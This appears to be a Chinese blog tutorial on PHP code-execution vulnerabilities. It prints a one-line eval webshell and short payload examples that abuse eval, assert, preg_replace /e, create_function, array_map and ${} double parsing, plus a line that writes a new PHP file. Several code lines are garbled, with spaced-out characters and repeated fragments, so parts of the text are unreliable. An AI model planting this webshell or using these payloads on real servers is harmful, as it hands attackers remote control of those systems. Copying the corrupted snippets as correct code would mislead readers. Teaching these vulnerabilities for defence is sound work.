1.代码漏洞原理
原理:用户输入的数据被当做后端代码进行执行
eg:一句话木马:<?php @eval($_REQUEST[8])?>
详解:其中eval就是执行命令的函数,$_REQUEST[8]就是接收的数据。eval函数把接收的数据当作php代码来执行。这样我们就能够让插了一句话木马的网站执行我们传递过去的任意php语句。
2.RCE(remote command/code execute)
RCE:远程代码/命令执行漏洞,攻击者可以直接在web页面向后台服务器远程注入操作系统命令或者代码,从而控制后台系统
3.常见的php代码执行函数
1.eval( a ) ; / / e v a l 是 代 码 执 行 用 的 最 多 的 , 他 可 以 多 行 执 行 ; 例 : e v a l ( a); //eval是代码执行用的最多的,他可以多行执行;例: eval( a);//eval是代码执行用的最多的,他可以多行执行;例:eval(_REQUEST[‘a’]);
2.assert( a ) / / 只 能 单 行 执 行 ; 例 : a s s e r t ( a)//只能单行执行;例:assert( a)//只能单行执行;例:assert(_REQUEST[‘a’]);
多行执行:写文件然后执行;例:file_put_contents(‘1.php’,‘<?php var_dump(8);phpinfo();?>’)
3.preg_replace() //正则替换函数,我在正则的课程里面讲过的函数,他其实也会产生代码执行;
例:preg_replace(‘/a/’,‘x’,‘abc’); <?php echo preg_replace('/a/e',$_GET[8],'bc');?>
4.create_function() //匿名函数
例: a = c r e a t e f u n c t i o n ( ′ a = create_function(' a=createfunction(′id’,'echo i d ; ′ ) ; 自 定 义 函 数 id;'); 自定义函数 id;′);自定义函数a
5.array_map() //回调函数,调用某个函数
例:array_map(‘assert’,array($_POST[‘c’]));
array_map( R E Q U E S T [ ′ b ′ ] , a r r a y ( _REQUEST['b'],array( REQUEST[′b′],array(_REQUEST[‘c’]));
6.二次解析
-
“${phpinfo()}”; => 代码执行phpinfo()
-
${phpinfo()};
-
$a = ${phpinfo()};
120
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
